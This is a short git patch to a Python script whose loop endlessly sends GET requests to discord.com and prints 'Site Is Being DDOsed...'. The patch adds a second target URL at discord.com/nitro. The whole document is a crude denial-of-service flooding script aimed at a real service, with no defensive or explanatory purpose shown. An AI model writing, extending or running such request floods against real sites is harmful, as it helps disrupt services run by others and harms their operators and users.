From a51b419a9550044f20f47ab5a6e030e42f13700b Mon Sep 17 00:00:00 2001 From: heckeralt Date: Fri, 27 Sep 2024 08:40:19 -0400 Subject: [PATCH] Update index.py --- index.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/index.py b/index.py index ad4068b..02298d7 100644 --- a/index.py +++ b/index.py @@ -2,4 +2,5 @@ import requests while True: # Your code here print("Site Is Being DDOsed...") - requests.get("https://discord.com") \ No newline at end of file + requests.get("https://discord.com") + requests.get("https://discord.com/nitro") \ No newline at end of file